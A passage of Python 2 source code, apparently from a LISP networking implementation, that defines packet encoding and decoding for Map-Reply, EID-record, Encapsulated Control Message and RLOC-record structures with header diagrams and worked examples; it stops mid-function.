# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply():
def __init__(self):
self.rloc_probe = False
self.echo_nonce_capable = False
self.security = False
self.record_count = 0
self.hop_count = 0
self.nonce = 0
self.keys = None
#enddef
def print_map_reply(self):
line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
"nonce: 0x{}"
lprint(line.format(bold("Map-Reply", False), \
"R" if self.rloc_probe else "r",
"E" if self.echo_nonce_capable else "e",
"S" if self.security else "s", self.hop_count, self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REPLY << 28) | self.record_count
first_long |= self.hop_count << 8
if (self.rloc_probe): first_long |= 0x08000000
if (self.echo_nonce_capable): first_long |= 0x04000000
if (self.security): first_long |= 0x02000000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.rloc_probe = True if (first_long & 0x08000000) else False
self.echo_nonce_capable = True if (first_long & 0x04000000) else False
self.security = True if (first_long & 0x02000000) else False
self.hop_count = (first_long >> 8) & 0xff
self.record_count = first_long & 0xff
self.nonce = nonce[0]
if (lisp_crypto_keys_by_nonce.has_key(self.nonce)):
self.keys = lisp_crypto_keys_by_nonce[self.nonce]
self.keys[1].delete_key_by_nonce(self.nonce)
#endif
return(packet)
#enddef
#endclass
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire locator-set records are encrypted with the chacha
# cipher.
#
# And this for a EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_eid_record():
def __init__(self):
self.record_ttl = 0
self.rloc_count = 0
self.action = 0
self.authoritative = False
self.ddt_incomplete = False
self.signature_count = 0
self.map_version = 0
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.record_ttl = 0
#enddef
def print_prefix(self):
if (self.group.is_null()):
return(green(self.eid.print_prefix(), False))
#endif
return(green(self.eid.print_sg(self.group), False))
#enddef
def print_ttl(self):
ttl = self.record_ttl
if (self.record_ttl & 0x80000000):
ttl = str(self.record_ttl & 0x7fffffff) + " secs"
elif ((ttl % 60) == 0):
ttl = str(ttl/60) + " hours"
else:
ttl = str(ttl) + " mins"
#endif
return(ttl)
#enddef
def store_ttl(self):
ttl = self.record_ttl * 60
if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
return(ttl)
#enddef
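    #
    # TTL examples for the two methods above: record_ttl is normally in
    # minutes, so a record_ttl of 1440 prints as "24 hours" and stores as
    # 86400 seconds. When the high-order bit is set, the low 31 bits are
    # already in seconds, so 0x80000005 prints as "5 secs" and stores as 5.
    #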
def print_record(self, indent, ddt):
incomplete = ""
sig_count = ""
action_str = bold("invalid-action", False)
if (ddt):
if (self.action < len(lisp_map_referral_action_string)):
action_str = lisp_map_referral_action_string[self.action]
action_str = bold(action_str, False)
incomplete = (", " + bold("ddt-incomplete", False)) if \
self.ddt_incomplete else ""
sig_count = (", sig-count: " + str(self.signature_count)) if \
(self.signature_count != 0) else ""
#endif
else:
if (self.action < len(lisp_map_reply_action_string)):
action_str = lisp_map_reply_action_string[self.action]
if (self.action != LISP_NO_ACTION):
action_str = bold(action_str, False)
#endif
#endif
#endif
afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
lprint(line.format(indent, self.print_ttl(), self.rloc_count,
action_str, "auth" if (self.authoritative is True) else "non-auth",
incomplete, sig_count, self.map_version, afi,
green(self.print_prefix(), False)))
#enddef
def encode(self):
action = self.action << 13
if (self.authoritative): action |= 0x1000
if (self.ddt_incomplete): action |= 0x800
#
# Decide on AFI value.
#
afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
if (afi < 0): afi = LISP_AFI_LCAF
sg = (self.group.is_null() == False)
if (sg): afi = LISP_AFI_LCAF
sig_mv = (self.signature_count << 12) | self.map_version
mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
self.rloc_count, mask_len, socket.htons(action),
socket.htons(sig_mv), socket.htons(afi))
#
# Check if we are encoding an (S,G) entry.
#
if (sg):
packet += self.eid.lcaf_encode_sg(self.group)
return(packet)
#endif
#
# Check if we are encoding an geo-prefix in an EID-record.
#
if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
packet = packet[0:-2]
packet += self.eid.address.encode_geo()
return(packet)
#endif
#
# Check if instance-ID needs to be encoded in the EID record.
#
if (afi == LISP_AFI_LCAF):
packet += self.eid.lcaf_encode_iid()
return(packet)
#endif
#
# Just encode the AFI for the EID.
#
packet += self.eid.pack_address()
return(packet)
#enddef
def decode(self, packet):
packet_format = "IBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
self.map_version, self.eid.afi = \
struct.unpack(packet_format, packet[:format_size])
self.record_ttl = socket.ntohl(self.record_ttl)
action = socket.ntohs(action)
self.action = (action >> 13) & 0x7
self.authoritative = True if ((action >> 12) & 1) else False
self.ddt_incomplete = True if ((action >> 11) & 1) else False
self.map_version = socket.ntohs(self.map_version)
self.signature_count = self.map_version >> 12
self.map_version = self.map_version & 0xfff
self.eid.afi = socket.ntohs(self.eid.afi)
self.eid.instance_id = 0
packet = packet[format_size::]
#
# Check if instance-ID LCAF is encoded in the EID-record.
#
if (self.eid.afi == LISP_AFI_LCAF):
packet, group = self.eid.lcaf_decode_eid(packet)
if (group): self.group = group
self.group.instance_id = self.eid.instance_id
return(packet)
#endif
packet = self.eid.unpack_address(packet)
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# Encapsulated Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm():
def __init__(self, sport):
self.security = False
self.ddt = False
self.to_etr = False
self.to_ms = False
self.length = 0
self.ttl = LISP_DEFAULT_ECM_TTL
self.protocol = LISP_UDP_PROTOCOL
self.ip_checksum = 0
self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.udp_sport = sport
self.udp_dport = LISP_CTRL_PORT
self.udp_checksum = 0
self.udp_length = 0
self.afi = LISP_AFI_NONE
#enddef
def print_ecm(self):
line = ("{} -> flags: {}{}{}{}, " + \
"inner IP: {} -> {}, inner UDP: {} -> {}")
lprint(line.format(bold("ECM", False), "S" if self.security else "s",
"D" if self.ddt else "d", "E" if self.to_etr else "e",
"M" if self.to_ms else "m",
green(self.source.print_address(), False),
green(self.dest.print_address(), False), self.udp_sport,
            self.udp_dport))
    #enddef
def encode(self, packet, inner_source, inner_dest):
self.udp_length = len(packet) + 8
self.source = inner_source
self.dest = inner_dest
if (inner_dest.is_ipv4()):
self.afi = LISP_AFI_IPV4
self.length = self.udp_length + 20
#endif
if (inner_dest.is_ipv6()):
self.afi = LISP_AFI_IPV6
self.length = self.udp_length
#endif
#
# Encode ECM header first, then the IPv4 or IPv6 header, then the
# UDP header.
#
first_long = (LISP_ECM << 28)
if (self.security): first_long |= 0x08000000
if (self.ddt): first_long |= 0x04000000
if (self.to_etr): first_long |= 0x02000000
if (self.to_ms): first_long |= 0x01000000
ecm = struct.pack("I", socket.htonl(first_long))
ip = ""
if (self.afi == LISP_AFI_IPV4):
ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
ip += self.source.pack_address()
ip += self.dest.pack_address()
ip = lisp_ip_checksum(ip)
#endif
if (self.afi == LISP_AFI_IPV6):
ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
self.protocol, self.ttl)
ip += self.source.pack_address()
ip += self.dest.pack_address()
#endif
s = socket.htons(self.udp_sport)
d = socket.htons(self.udp_dport)
l = socket.htons(self.udp_length)
c = socket.htons(self.udp_checksum)
udp = struct.pack("HHHH", s, d, l, c)
return(ecm + ip + udp)
#enddef
def decode(self, packet):
#
# Decode ECM header.
#
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.security = True if (first_long & 0x08000000) else False
self.ddt = True if (first_long & 0x04000000) else False
self.to_etr = True if (first_long & 0x02000000) else False
self.to_ms = True if (first_long & 0x01000000) else False
packet = packet[format_size::]
#
# Decode inner IPv4/IPv6 and UDP header.
#
if (len(packet) < 1): return(None)
version = struct.unpack("B", packet[0:1])[0]
version = version >> 4
if (version == 4):
format_size = struct.calcsize("HHIBBH")
if (len(packet) < format_size): return(None)
x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
self.length = socket.ntohs(l)
self.ttl = t
self.protocol = p
self.ip_checksum = socket.ntohs(c)
self.source.afi = self.dest.afi = LISP_AFI_IPV4
#
# Zero out IPv4 header checksum.
#
p = struct.pack("H", 0)
offset1 = struct.calcsize("HHIBB")
offset2 = struct.calcsize("H")
packet = packet[:offset1] + p + packet[offset1+offset2:]
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
if (version == 6):
format_size = struct.calcsize("IHBB")
if (len(packet) < format_size): return(None)
x, l, p, t = struct.unpack("IHBB", packet[:format_size])
self.length = socket.ntohs(l)
self.protocol = p
self.ttl = t
self.source.afi = self.dest.afi = LISP_AFI_IPV6
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source.mask_len = self.source.host_mask_len()
self.dest.mask_len = self.dest.host_mask_len()
format_size = struct.calcsize("HHHH")
if (len(packet) < format_size): return(None)
s, d, l, c = struct.unpack("HHHH", packet[:format_size])
self.udp_sport = socket.ntohs(s)
self.udp_dport = socket.ntohs(d)
self.udp_length = socket.ntohs(l)
self.udp_checksum = socket.ntohs(c)
packet = packet[format_size::]
return(packet)
#enddef
#endclass
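#
# Size arithmetic for the ECM encode() above: the prepended headers add 4
# bytes of ECM header, an IP header (20 bytes for IPv4, 40 for IPv6), and an
# 8-byte UDP header. So for an inner control message of length N, udp_length
# is N + 8 and the IPv4 total-length field is N + 28; for IPv6, the length
# field carries just the payload length N + 8.
#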
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# JSON Data Model Type Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 14 | kid | Rvd2|E|B| Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | JSON length | JSON binary/text encoding ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Optional Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When the E-bit is set to 1, then the kid is key-id and indicates that
# value fields in JSON string are encrypted with the encryption key
# associated with key-id 'kid'.
#
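# Worked example of the kid encoding, matching encode_json() below: for an
# encrypted JSON string using key-id 3, the kid byte is (3 << 5) | 0x02,
# that is 0x62; a decoder recovers the E-bit with (byte & 0x02) and the
# key-id with (byte >> 5).
#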
class lisp_rloc_record():
def __init__(self):
self.priority = 0
self.weight = 0
self.mpriority = 0
self.mweight = 0
self.local_bit = False
self.probe_bit = False
self.reach_bit = False
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.rloc_name = None
self.keys = None
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def print_record(self, indent):
rloc_str = self.print_rloc_name()
if (rloc_str != ""): rloc_str = ", " + rloc_str
geo_str = ""
if (self.geo):
name = ""
if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
#endif
elp_str = ""
if (self.elp):
name = ""
if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
#endif
rle_str = ""
if (self.rle):
name = ""
if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False,
True))
#endif
json_str = ""
if (self.json):
name = ""
if (self.json.json_name):
name = "'{}' ".format(self.json.json_name)
#endif
json_str = ", json: {}".format(self.json.print_json(False))
#endif
sec_str = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
sec_str = ", " + self.keys[1].print_keys()
#endif
line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}")
lprint(line.format(indent, self.print_flags(), self.priority,
self.weight, self.mpriority, self.mweight, self.rloc.afi,
red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
elp_str, rle_str, json_str, sec_str))
#enddef
def print_flags(self):
return("{}{}{}".format("L" if self.local_bit else "l", "P" \
if self.probe_bit else "p", "R" if self.reach_bit else "r"))
#enddef
def store_rloc_entry(self, rloc_entry):
rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
else rloc_entry.translated_rloc
self.rloc.copy_address(rloc)
if (rloc_entry.rloc_name):
self.rloc_name = rloc_entry.rloc_name
#endif
if (rloc_entry.geo):
self.geo = rloc_entry.geo
else:
name = rloc_entry.geo_name
if (name and lisp_geo_list.has_key(name)):
self.geo = lisp_geo_list[name]
#endif
#endif
if (rloc_entry.elp):
self.elp = rloc_entry.elp
else:
name = rloc_entry.elp_name
if (name and lisp_elp_list.has_key(name)):
self.elp = lisp_elp_list[name]
#endif
#endif
if (rloc_entry.rle):
self.rle = rloc_entry.rle
else:
name = rloc_entry.rle_name
if (name and lisp_rle_list.has_key(name)):
self.rle = lisp_rle_list[name]
#endif
#endif
if (rloc_entry.json):
self.json = rloc_entry.json
else:
name = rloc_entry.json_name
if (name and lisp_json_list.has_key(name)):
self.json = lisp_json_list[name]
#endif
#endif
self.priority = rloc_entry.priority
self.weight = rloc_entry.weight
self.mpriority = rloc_entry.mpriority
self.mweight = rloc_entry.mweight
#enddef
def encode_json(self, lisp_json):
json_string = lisp_json.json_string
kid = 0
if (lisp_json.json_encrypted):
kid = (lisp_json.json_key_id << 5) | 0x02
#endif
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
addr_len = self.rloc.addr_length() + 2
lcaf_len = socket.htons(len(json_string) + addr_len)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, kid,
lcaf_len, json_len)
packet += json_string
#
# If telemetry, store RLOC address in LCAF.
#
if (lisp_is_json_telemetry(json_string)):
packet += struct.pack("H", socket.htons(self.rloc.afi))
packet += self.rloc.pack_address()
else:
packet += struct.pack("H", 0)
#endif
return(packet)
#enddef
def encode_lcaf(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
gpkt = ""
if (self.geo):
gpkt = self.geo.encode_geo()
#endif
epkt = ""
if (self.elp):
elp_recs = ""
for elp_node in self.elp.elp_nodes:
afi = socket.htons(elp_node.address.afi)
flags = 0
if (elp_node.eid): flags |= 0x4
if (elp_node.probe): flags |= 0x2
if (elp_node.strict): flags |= 0x1
flags = socket.htons(flags)
elp_recs += struct.pack("HH", flags, afi)
elp_recs += elp_node.address.pack_address()
#endfor
elp_len = socket.htons(len(elp_recs))
epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
0, elp_len)
epkt += elp_recs
#endif
rpkt = ""
if (self.rle):
rle_recs = ""
for rle_node in self.rle.rle_nodes:
afi = socket.htons(rle_node.address.afi)
rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
rle_recs += rle_node.address.pack_address()
if (rle_node.rloc_name):
rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
rle_recs += rle_node.rloc_name + "\0"
#endif
#endfor
rle_len = socket.htons(len(rle_recs))
